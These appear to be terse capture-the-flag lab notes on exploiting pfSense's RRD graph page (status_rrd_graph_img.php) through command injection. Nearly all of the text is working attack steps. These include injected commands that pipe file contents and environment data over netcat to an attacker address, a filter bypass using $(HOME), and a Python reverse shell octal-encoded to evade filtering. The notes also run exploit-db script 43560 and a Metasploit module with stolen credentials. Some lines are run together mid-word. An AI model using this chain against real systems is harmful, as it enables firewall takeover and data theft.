Last updated
pfsense > status > RRD Graphs
Cleanup the link:
https://$IP/status_rrd.graph_img.php?database=system-processor.rrd
https://$IP/status_rrd.graph_img.php?database=queues ..from exploit/blog
https://$IP/status_rrd.graph_img.php?database=queues;sleep+10 ..worked!
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec ..ugly results
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000 .. root
.. queues;echo+hostname|nc+10.10.14.6+9000 .. pfSense
nc -nvlp 9001
------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000 ..works
.. queues;find+/|nc+10.10.14.6+9000 ..fail ...find data in slash
.. queues;find+.|nc+10.10.14.6+9000 ..ok
nc -lvnp 9001 > filesystem.txt ..catch
.. queues;echo+abc|nc+10.10.14.6+9000 ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000 ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000 ..get environment HOME=/
.. queues;echo+$(HOME)|nc+10.10.14.6+9000 ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000 ..FIND / ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001
nc -lvnp 9001 > filesystem.txt
grep root.txt filesystem.txt
------------------------------
reverse
Python Reverse Shell
vim cmd ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd ..send/share the file
nc -nvlp 1234 ..catch shell
..queues;nc+10.10.10.6+9001|python+& ..fail
..queues;nc+10.10.10.6+9001|python ..ok pull file, python execute
connected!> gobuster dir -w medium.txt dir -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt ..found username!!!https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt ..view results
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)
---------------------
Result:
\160\171\164\150\...
Verify:
printf '\160\171\164\150\...'
python -c 'import socket... worked!
---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..rootservice postgresql start
msfconsole
search pfsense
graph injection
locate pfsense_graph
use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname